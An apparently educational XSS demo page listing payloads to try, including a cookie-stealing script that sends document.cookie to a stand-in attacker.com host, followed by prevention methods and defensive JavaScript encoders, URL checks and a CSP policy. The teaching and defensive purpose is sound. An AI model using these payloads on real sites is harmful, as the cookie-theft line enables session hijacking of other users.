XSS (Cross-Site Scripting) Demo

Cross-Site Scripting (XSS) occurs when an application includes untrusted data in a web page without proper validation or escaping, allowing attackers to execute scripts in other users' browsers.

Types of XSS:

  • Reflected XSS: Script reflected back from user input
  • Stored XSS: Script stored in database and executed later
  • DOM-based XSS: Client-side script manipulation

Try These XSS Payloads:

  # Basic alert
  <script>alert('XSS')</script>

  # Cookie stealing
  <script>document.location='http://attacker.com/steal.php?cookie='+document.cookie</script>

  # Image with onerror
  <img src="x" onerror="alert('XSS')">

  # SVG payload
  <svg onload="alert('XSS')">

  # Event handlers
  <body onload="alert('XSS')">
  <div onmouseover="alert('XSS')">Hover me</div>

  # JavaScript protocol
  <a href="javascript:alert('XSS')">Click me</a>

  # Iframe injection
  <iframe src="javascript:alert('XSS')"></iframe>

XSS Prevention Methods:

  • HTML Encoding: Encode user input for HTML context
  • Attribute Encoding: Encode for HTML attributes
  • JavaScript Encoding: Encode for JavaScript context
  • CSS Encoding: Encode for CSS context
  • Content Security Policy (CSP): Restrict script sources
  • Input Validation: Whitelist allowed input
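The prevention list above names one encoder per output context. The block below is an added example written for this page, not code from the demo application itself: it implements the HTML, attribute, JavaScript and CSS encoders, a URL check that refuses the javascript: scheme, an allowlist validator, and a sample CSP value, then renders the page's own alert payload through the HTML encoder to show that the script tag is neutralised. Function names, the example.invalid base URL and the CSP policy string are all assumptions of this example.

```javascript
// Added example (not part of the original demo page): context-aware output
// encoding plus input validation and a sample CSP value.

// HTML body context: the five characters that can break out of text content.
function encodeForHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// HTML attribute context: encode everything except alphanumerics as &#xHH;
// so the value cannot terminate the attribute or add an event handler,
// whichever quote style (or none) the template used.
function encodeForHtmlAttribute(s) {
  return String(s).replace(/[^A-Za-z0-9]/g, (c) => `&#x${c.charCodeAt(0).toString(16)};`);
}

// JavaScript string context: \xHH or \uHHHH escapes, so a value placed inside
// a quoted JS string literal cannot close the quote or the <script> element.
function encodeForJavaScript(s) {
  return String(s).replace(/[^A-Za-z0-9]/g, (c) => {
    const code = c.charCodeAt(0);
    return code < 256
      ? `\\x${code.toString(16).padStart(2, '0')}`
      : `\\u${code.toString(16).padStart(4, '0')}`;
  });
}

// CSS context: backslash-hex escape followed by a space (the space terminates
// the escape so the next character is not read as part of the hex value).
function encodeForCss(s) {
  return String(s).replace(/[^A-Za-z0-9]/g, (c) => `\\${c.charCodeAt(0).toString(16)} `);
}

// URL context (href/src): encoding does not help here because javascript: is a
// valid URL; only http(s) URLs are allowed through. Relative URLs resolve
// against a placeholder base (assumption: the site's own origin in practice).
function safeUrl(s) {
  try {
    const u = new URL(String(s), 'https://example.invalid/');
    return (u.protocol === 'http:' || u.protocol === 'https:') ? u.href : '';
  } catch (e) {
    return '';
  }
}

// Input validation: allowlist rather than blocklist. A username is limited to
// a small character set, which rejects every payload on this page outright.
function isValidUsername(s) {
  return /^[A-Za-z0-9_]{1,32}$/.test(String(s));
}

// Sample Content Security Policy value (assumption: a policy this strict suits
// the demo app). It forbids inline scripts, so a reflected <script> block or
// onerror= handler is blocked by the browser even if encoding was missed.
function cspHeaderValue() {
  return "default-src 'self'; script-src 'self'; object-src 'none'; base-uri 'self'";
}

// Render a stored message: the author goes into an attribute, the body into
// text content, each with the encoder for its context.
function renderMessage(author, message) {
  return `<div class="msg" title="${encodeForHtmlAttribute(author)}">${encodeForHtml(message)}</div>`;
}

// Constructed sample: the page's basic alert payload as a submitted message.
const samplePayload = "<script>alert('XSS')</script>";
console.log(renderMessage('alice', samplePayload));
console.log('javascript: link rendered as:', JSON.stringify(safeUrl("javascript:alert('XSS')")));
```

Note that the attribute and JavaScript encoders are deliberately more aggressive than the HTML one: inside an attribute or a script string there are many more characters that can change the parse, so encoding everything non-alphanumeric is the simpler safe choice.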

XSS Vulnerability Test
